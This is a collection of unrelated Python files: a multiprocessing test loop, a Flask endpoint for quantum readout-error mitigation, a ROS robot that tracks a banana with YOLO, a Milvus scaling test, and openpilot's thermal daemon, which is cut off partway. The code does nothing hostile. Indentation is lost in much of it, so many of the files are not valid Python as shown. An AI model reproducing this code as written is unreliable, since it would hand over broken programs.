        if info != expected[con]:
            logging.info(f"{pro.name}: {info}")
        else:
            logging.info(f"{pro.name}: is_alive() {pro.is_alive()}, exit code {pro.exitcode}")
    else:
        logging.info(f"{con} not in list {expected.keys()}")
if __name__ == '__main__':
runTime = 120 # total loop time
looptime = 20 # single loop time
loopCounts = 20 # total loop counts
loop = 0
start = time.time()
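    # Note: the 'else' clauses on the two while loops below always run, because
    # neither loop body contains a 'break'; they fire once the loop condition
    # becomes false.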
    # Exit once 'loopCounts' iterations have run or more than 'runTime' seconds have elapsed.
    while (loop < loopCounts) and (time.time()-start < runTime):
        logging.info(f"****** loop {loop} ******")
START = time.time()
i = 0
while time.time()-START < looptime:
logging.info(f"****** Sub loop {i} ******")
Subpro = Process(target=worker, kwargs={'name': 'Hanna', 'sleep': 4}, name='WORKER')
proStatus(con='initial', pro=Subpro)
Subpro.start()
proStatus(con='start', pro=Subpro)
boss(name='BOSS', sleep=2)
Subpro.join()
proStatus(con='stop', pro=Subpro)
i += 1
else:
logging.info("Post Loop")
loop += 1
else:
logging.info("> End.")
|
routes.py
|
# ******************************************************************************
# Copyright (c) 2020 University of Stuttgart
#
# See the NOTICE file(s) distributed with this work for additional
# information regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ******************************************************************************
import threading
from app import app, unfolding_utils
from flask import jsonify, abort, request
@app.route('/provenance-service', methods=['POST'])
def mitigate_error():
"""Mitigate the readout-error from the given result distribution."""
app.logger.info('Received Post request to mitigate error...')
if not request.json:
app.logger.error("Service currently only supports JSON")
abort(400, "Only Json supported")
if 'CorrelationId' not in request.json:
app.logger.error("CorrelationId not defined in request")
abort(400, "CorrelationId not defined in request")
correlation_Id = request.json['CorrelationId']
app.logger.info("CorrelationId: " + correlation_Id)
if 'ReturnAddress' not in request.json:
app.logger.error("ReturnAddress not defined in request")
abort(400, "ReturnAddress not defined in request")
return_address = request.json['ReturnAddress']
app.logger.info("ReturnAddress: " + return_address)
if 'QPU' not in request.json:
app.logger.error("QPU not defined in request")
abort(400, "QPU not defined in request")
qpu = request.json['QPU']
if 'UnfoldingTechnique' not in request.json:
app.logger.error("UnfoldingTechnique not defined in request")
abort(400, "UnfoldingTechnique defined in request")
unfolding_technique = request.json['UnfoldingTechnique']
if not unfolding_technique == 'Correction Matrix':
app.logger.error("UnfoldingTechnique is not supported. Currently only Correction Matrix can be used")
abort(400, "UnfoldingTechnique is not supported. Currently only Correction Matrix can be used")
max_age = request.json['MaxAge']
access_token = request.json['AccessToken']
if 'Result' not in request.json:
app.logger.error("Result not defined in request")
abort(400, "Result not defined in request")
result = request.json['Result']
app.logger.info("Result to mitigate: " + result)
app.logger.info("Passed input is valid")
t = threading.Thread(target=unfolding_utils.mitigate_error, args=(correlation_Id, return_address, qpu, max_age, result, access_token))
t.daemon = True
t.start()
return jsonify({'Status': "Circuit execution process initiated"}), 200
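# Example request payload accepted by this endpoint (a hedged sketch; all of the
# values below are hypothetical placeholders):
#
#   POST /provenance-service
#   {
#     "CorrelationId": "1234-abcd",
#     "ReturnAddress": "http://camunda:8080/engine-rest/message",
#     "QPU": "ibmq_lima",
#     "UnfoldingTechnique": "Correction Matrix",
#     "MaxAge": 1440,
#     "AccessToken": "<provider access token>",
#     "Result": "{\"00\": 490, \"11\": 534}"
#   }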
|
bulldog_vision_test.py
|
#!/usr/bin/env python
#!coding=utf-8
import rospy
import numpy as np
import PIL.Image as pilimage
import actionlib
from sensor_msgs.msg import CompressedImage
from sensor_msgs.msg import Image
from std_msgs.msg import Float64
from cv_bridge import CvBridge, CvBridgeError
import cv2
import time
from yolo import YOLO
from sensor_msgs.msg import Joy
from std_msgs.msg import String
from geometry_msgs.msg import Twist
from tf.transformations import *
from math import pi
from geometry_msgs.msg import PoseStamped
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from geometry_msgs.msg import PoseWithCovarianceStamped,PoseStamped,Twist
from std_msgs.msg import Header
from sensor_msgs.msg import JointState
from threading import Thread
import threading
global RV2_motor1_joint
yolo = YOLO()
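# Overview: this node runs three loops in parallel. image_converter subscribes
# to the camera topic and writes YOLO detections into the globals delta_x and
# label_list; motor1_move turns the torso motor to keep the detected banana
# centred; base_move/cmd sends move_base goals once a banana is seen.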
class image_converter:
def __init__(self):
        # Create the cv_bridge and declare the image subscriber
global delta_x
# location_pub = rospy.Publisher("cv_bridge_location", Float64, queue_size=1)
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/mid_camera/color/image_raw/compressed", CompressedImage, self.callback)
def callback(self,data):
        # Use cv_bridge to convert the ROS image data into OpenCV format
        global delta_x, label_list
        try:
            cv_image = self.bridge.compressed_imgmsg_to_cv2(data, "bgr8")
        except CvBridgeError as e:
            print(e)
        # Convert BGR to RGB
        cv_image = cv2.cvtColor(cv_image,cv2.COLOR_BGR2RGB)
        # Convert the OpenCV array to a PIL Image
        cv_image = pilimage.fromarray(np.uint8(cv_image))
        # Run YOLO object detection and extract bounding boxes and labels
        cv_image, bbox_list, label_list = yolo.detect_image(cv_image)
        # Convert the PIL Image back to an OpenCV array
        cv_image = np.array(cv_image)
        # Convert RGB back to BGR
        cv_image = cv2.cvtColor(cv_image,cv2.COLOR_RGB2BGR)
        # Display the annotated image
cv2.imshow("Image window", cv_image)
cv2.waitKey(3)
        if type(label_list) != int: # when nothing is detected, bbox_list and label_list are the int 1
            num_of_obj = len(label_list)
            #print('num_of_object:', num_of_obj)
            # Offset between the tracked object and the image centre
for i in range(num_of_obj):
if 'banana' in label_list[i]:
object_center = (bbox_list[i][1]+bbox_list[i][3])*0.5
delta_x = 320-object_center
# print(delta_x)
return delta_x
# location_pub.publish(delta_x)
#motor1_move()
elif 'banana' in label_list[i]:
print("yyy")
pass
else:
            print('YOLO did not detect any objects')
pass
def judge_bed():
global delta_x
image_converter()
def motor1_move():
time.sleep(1)
global command_vel_pub_m, delta_x, RV2_motor1_joint
# rospy.Subscriber('/joint_states_motor',JointState,RV2_motorjointstate_callback)
while not rospy.is_shutdown():
print(delta_x)
        # Middle range of the torso joint
if -1.5 < RV2_motor1_joint < 1.5:
            # Turn-left condition
if delta_x > 200:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0.48]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif 80 < delta_x < 200:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [(delta_x - 40) * 0.003]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
            # Turn-right condition
elif delta_x < -200:
print ("b")
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [-0.48]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif -200 < delta_x < -80:
print ("b")
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [(delta_x + 40) * 0.003]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
            # Stop condition
elif -80 < delta_x < 80:
time.sleep(2)
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
        # Left joint limit reached
if 1.5 < RV2_motor1_joint:
            # Turn-left condition
if delta_x > 80:
print("a")
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
            # Turn-right condition
elif delta_x < -200:
print ("b")
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [-0.48]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif -200 < delta_x < -80:
print ("b")
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [(delta_x + 40) * 0.003]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
            # Stop condition
elif -80 < delta_x < 80:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
        # Right joint limit reached
if RV2_motor1_joint < -1.5:
            # Turn-left condition
if delta_x > 200:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0.48]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
elif 80 < delta_x < 200:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [(delta_x - 40) * 0.003]
print (motor_vel)
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
            # Turn-right condition
elif delta_x < -80:
print ("b")
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(2)
            # Stop condition
elif -80 < delta_x < 80:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
else:
now = rospy.Time.now()
motor_vel = JointState()
motor_vel.header = Header()
motor_vel.header.stamp = now
motor_vel.header.frame_id = "bulldog"
motor_vel.name = ["motor1"]
motor_vel.velocity = [0]
command_vel_pub_m.publish(motor_vel)
time.sleep(0.5)
time.sleep(1)
#for object in vision_database_dict:
    # Then convert the OpenCV-format data back to a ROS Image message and publish it
# try:
# #self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, "bgr8"))
# location_pub.publish(location_pub)
# except CvBridgeError as e:
# print('e')
def RV2_motorjointstate_callback(data):
    # Global holding the RV2 motor1 joint position, updated from each JointState message
global RV2_motor1_joint
RV2_motor1_joint = data.position[0]
print(RV2_motor1_joint)
def active_cb(extra):
rospy.loginfo("Goal pose being processed")
def feedback_cb(feedback):
rospy.loginfo("Current location: "+str(feedback))
def done_cb(status, result):
if status == 3:
rospy.loginfo("Goal reached")
if status == 2 or status == 8:
rospy.loginfo("Goal cancelled")
if status == 4:
rospy.loginfo("Goal aborted")
def base_move():
#rospy.init_node('listener', anonymous=True)
rospy.Subscriber('/amcl_pose',PoseWithCovarianceStamped,current_pose)
time.sleep(2)
cmd()
rospy.spin()
def current_pose(msg):
global posex,posey
posex = msg.pose.pose.position.x
posey = msg.pose.pose.position.y
print (posex,posey)
def cmd():
global label_list
#flag_k = 0
while not rospy.is_shutdown():
        if type(label_list) != int: # when nothing is detected, bbox_list and label_list are the int 1
num_of_obj = len(label_list)
#print('num_of_object:', num_of_obj)
            # Offset between the tracked object and the image centre
for i in range(num_of_obj):
#if 'banana' in label_list[i] and flag_k == 0:
if 'banana' in label_list[i]:
print ('a')
navclient = actionlib.SimpleActionClient('move_base',MoveBaseAction)
navclient.wait_for_server()
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = posex+0.3
goal.target_pose.pose.position.y = posey+0.3
goal.target_pose.pose.position.z = 0.0
goal.target_pose.pose.orientation.x = 0.0
goal.target_pose.pose.orientation.y = 0.0
goal.target_pose.pose.orientation.z = 0.0
goal.target_pose.pose.orientation.w = 1.0
#flag_k = flag_k + 1
navclient.send_goal(goal,done_cb,active_cb, feedback_cb)
finished = navclient.wait_for_result()
if not finished:
rospy.logerr("Action server not available!")
else:
rospy.loginfo ( navclient.get_result())
time.sleep(10)
#if 'banana' not in label_list[i] and flag_k >= 1:
Goal()
time.sleep(1)
def Goal():
navclient = actionlib.SimpleActionClient('move_base',MoveBaseAction)
navclient.wait_for_server()
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = -0.2
goal.target_pose.pose.position.y = 0
goal.target_pose.pose.position.z = 0.0
goal.target_pose.pose.orientation.x = 0.0
goal.target_pose.pose.orientation.y = 0.0
goal.target_pose.pose.orientation.z = 0.0
goal.target_pose.pose.orientation.w = 1.0
navclient.send_goal(goal,done_cb,active_cb, feedback_cb)
finished = navclient.wait_for_result()
if not finished:
rospy.logerr("Action server not available!")
else:
rospy.loginfo ( navclient.get_result())
exit()
if __name__ == '__main__':
try:
        # Initialise the ROS node
rospy.init_node("vision")
rospy.loginfo("Starting cv_bridge_test node")
global command_vel_pub_m, delta_x
        # Create the motor velocity publisher
command_vel_pub_m = rospy.Publisher('/motor_control/input/velocity', JointState, queue_size = 100, latch=True)
        # Subscribe to the torso motor joint states
rospy.Subscriber('/joint_states_motor',JointState,RV2_motorjointstate_callback)
        # Thread running the YOLO detection routine
t_judge_bed = threading.Thread(target = judge_bed)
t_judge_bed.start()
time.sleep(2)
        # Thread running the torso motor control routine
t_motor1 = threading.Thread(target = motor1_move)
t_motor1.start()
time.sleep(2)
t_base = threading.Thread(target = base_move)
t_base.start()
rospy.spin()
except KeyboardInterrupt:
print("Shutting down cv_bridge_test node.")
cv2.destroyAllWindows()
|
test_query_node_scale.py
|
import threading
import time
import pytest
from base.collection_wrapper import ApiCollectionWrapper
from common.common_type import CaseLabel
from customize.milvus_operator import MilvusOperator
from common import common_func as cf
from common import common_type as ct
from scale import constants
from pymilvus import Index, connections
from utils.util_log import test_log as log
from utils.util_k8s import wait_pods_ready
prefix = "search_scale"
nb = 5000
nq = 5
default_schema = cf.gen_default_collection_schema()
default_search_exp = "int64 >= 0"
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
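# IVF_SQ8 is an inverted-file index with 8-bit scalar quantisation; nlist=64 is
# the number of coarse clusters the vectors are partitioned into, and
# metric_type L2 selects Euclidean distance.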
class TestQueryNodeScale:
@pytest.mark.tags(CaseLabel.L3)
def test_scale_query_node(self):
release_name = "scale-query"
query_config = {
'metadata.namespace': constants.NAMESPACE,
'metadata.name': release_name,
'spec.components.image': 'harbor.zilliz.cc/milvus/milvus:master-20211202-ed546d0',
'spec.components.proxy.serviceType': 'LoadBalancer',
'spec.components.queryNode.replicas': 1,
'spec.config.dataCoord.enableCompaction': True,
'spec.config.dataCoord.enableGarbageCollection': True
}
mic = MilvusOperator()
mic.install(query_config)
healthy = mic.wait_for_healthy(release_name, constants.NAMESPACE, timeout=1200)
log.info(f"milvus healthy: {healthy}")
host = mic.endpoint(release_name, constants.NAMESPACE).split(':')[0]
# host = "10.98.0.8"
# connect
connections.add_connection(default={"host": host, "port": 19530})
connections.connect(alias='default')
# create
c_name = cf.gen_unique_str("scale_query")
# c_name = 'scale_query_DymS7kI4'
collection_w = ApiCollectionWrapper()
collection_w.init_collection(name=c_name, schema=cf.gen_default_collection_schema(), shards_num=2)
# insert two segments
for i in range(3):
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
log.debug(collection_w.num_entities)
# create index
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
assert collection_w.index()[0] == Index(collection_w.collection, ct.default_float_vec_field_name,
default_index_params)
# load
collection_w.load()
# scale queryNode to 5
mic.upgrade(release_name, {'spec.components.queryNode.replicas': 5}, constants.NAMESPACE)
# continuously search
def do_search():
while True:
search_res, _ = collection_w.search(cf.gen_vectors(1, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit)
log.debug(search_res[0].ids)
assert len(search_res[0].ids) == ct.default_limit
t_search = threading.Thread(target=do_search, args=(), daemon=True)
t_search.start()
# wait new QN running, continuously insert
# time.sleep(10)
healthy = mic.wait_for_healthy(release_name, constants.NAMESPACE, timeout=1200)
log.info(f"milvus healthy after scale up: {healthy}")
# wait_pods_ready(constants.NAMESPACE, f"app.kubernetes.io/instance={release_name}")
def do_insert():
while True:
tmp_df = cf.gen_default_dataframe_data(1000)
collection_w.insert(tmp_df)
t_insert = threading.Thread(target=do_insert, args=(), daemon=True)
t_insert.start()
log.debug(collection_w.num_entities)
time.sleep(20)
log.debug("Expand querynode test finished")
mic.upgrade(release_name, {'spec.components.queryNode.replicas': 3}, constants.NAMESPACE)
time.sleep(60)
wait_pods_ready(constants.NAMESPACE, f"app.kubernetes.io/instance={release_name}")
log.debug(collection_w.num_entities)
time.sleep(60)
log.debug("Shrink querynode test finished")
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
from smbus2 import SMBus
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.numpy_fast import interp
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.controls.lib.pid import PIController
from selfdrive.hardware import EON, HARDWARE, PC, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
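# Worked example of the hysteresis this gives: at 90C while in the yellow band
# (75-96) we stay yellow; once the filtered temp exceeds 96 we jump to red
# (80-107), and we only fall back to yellow after it drops below 80.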
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5 if TICI else 70.0
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
def read_tz(x):
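  """Return the raw sysfs value for thermal zone `x` (0 if unavailable); the
  caller scales it using the divisors in thermal_config."""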
if x is None:
return 0
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def setup_eon_fan():
os.system("echo 2 > /sys/module/dwc3_msm/parameters/otg_switch")
last_eon_fan_val = None
def set_eon_fan(val):
global last_eon_fan_val
if last_eon_fan_val is None or last_eon_fan_val != val:
bus = SMBus(7, force=True)
try:
i = [0x1, 0x3 | 0, 0x3 | 0x08, 0x3 | 0x10][val]
bus.write_i2c_block_data(0x3d, 0, [i])
except OSError:
# tusb320
if val == 0:
bus.write_i2c_block_data(0x67, 0xa, [0])
else:
bus.write_i2c_block_data(0x67, 0xa, [0x20])
bus.write_i2c_block_data(0x67, 0x8, [(val - 1) << 6])
bus.close()
last_eon_fan_val = val
# temp thresholds to control fan speed - high hysteresis
_TEMP_THRS_H = [50., 65., 80., 10000]
# temp thresholds to control fan speed - low hysteresis
_TEMP_THRS_L = [42.5, 57.5, 72.5, 10000]
# fan speed options
_FAN_SPEEDS = [0, 16384, 32768, 65535]
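# Worked example of the logic in handle_fan_eon below: with max_cpu_temp=70 and
# a current fan_speed of 16384, the first high threshold above 70 is 80, giving
# new_speed_h=32768; since that exceeds the current speed the fan steps up, and
# set_eon_fan(32768 // 16384) selects fan level 2.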
def handle_fan_eon(controller, max_cpu_temp, fan_speed, ignition):
new_speed_h = next(speed for speed, temp_h in zip(_FAN_SPEEDS, _TEMP_THRS_H) if temp_h > max_cpu_temp)
new_speed_l = next(speed for speed, temp_l in zip(_FAN_SPEEDS, _TEMP_THRS_L) if temp_l > max_cpu_temp)
if new_speed_h > fan_speed:
# update speed if using the high thresholds results in fan speed increment
fan_speed = new_speed_h
elif new_speed_l < fan_speed:
# update speed if using the low thresholds results in fan speed decrement
fan_speed = new_speed_l
set_eon_fan(fan_speed // 16384)
return fan_speed
def handle_fan_uno(controller, max_cpu_temp, fan_speed, ignition):
new_speed = int(interp(max_cpu_temp, [40.0, 80.0], [0, 80]))
if not ignition:
new_speed = min(30, new_speed)
return new_speed
last_ignition = False
def handle_fan_tici(controller, max_cpu_temp, fan_speed, ignition):
global last_ignition
controller.neg_limit = -(80 if ignition else 30)
controller.pos_limit = -(30 if ignition else 0)
if ignition != last_ignition:
controller.reset()
fan_pwr_out = -int(controller.update(
setpoint=75,
measurement=max_cpu_temp,
feedforward=interp(max_cpu_temp, [60.0, 100.0], [0, -80])
))
last_ignition = ignition
return fan_pwr_out
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
hw_state = HardwareState(
network_type=network_type,
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=HARDWARE.get_modem_temperatures(),
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
except Exception:
cloudlog.exception("Error getting network status")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
fan_speed = 0
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
usb_power = True
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
handle_fan = None
is_uno = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
# TODO: use PI controller for UNO
controller = PIController(k_p=0, k_i=2e-3, neg_limit=-80, pos_limit=0, rate=(1 / DT_TRML))
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
usb_power = peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client
# Setup fan handler on first connect to panda
if handle_fan is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
if TICI:
cloudlog.info("Setting up TICI fan handler")
handle_fan = handle_fan_tici
elif is_uno or PC:
cloudlog.info("Setting up UNO fan handler")
handle_fan = handle_fan_uno
else:
cloudlog.info("Setting up EON fan handler")
setup_eon_fan()
handle_fan = handle_fan_eon
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.batteryPercent = HARDWARE.get_battery_capacity()
msg.deviceState.batteryCurrent = HARDWARE.get_battery_current()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if handle_fan is not None:
fan_speed = handle_fan(controller, max_comp_temp, fan_speed, onroad_conditions["ignition"])
msg.deviceState.fanSpeedPercentDesired = fan_speed
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = (now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
if TICI:
missing = (not Path("/data/media").is_mount()) and (not os.path.isfile("/persist/comma/living-in-the-moment"))
set_offroad_alert_if_changed("Offroad_StorageMissing", missing)
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
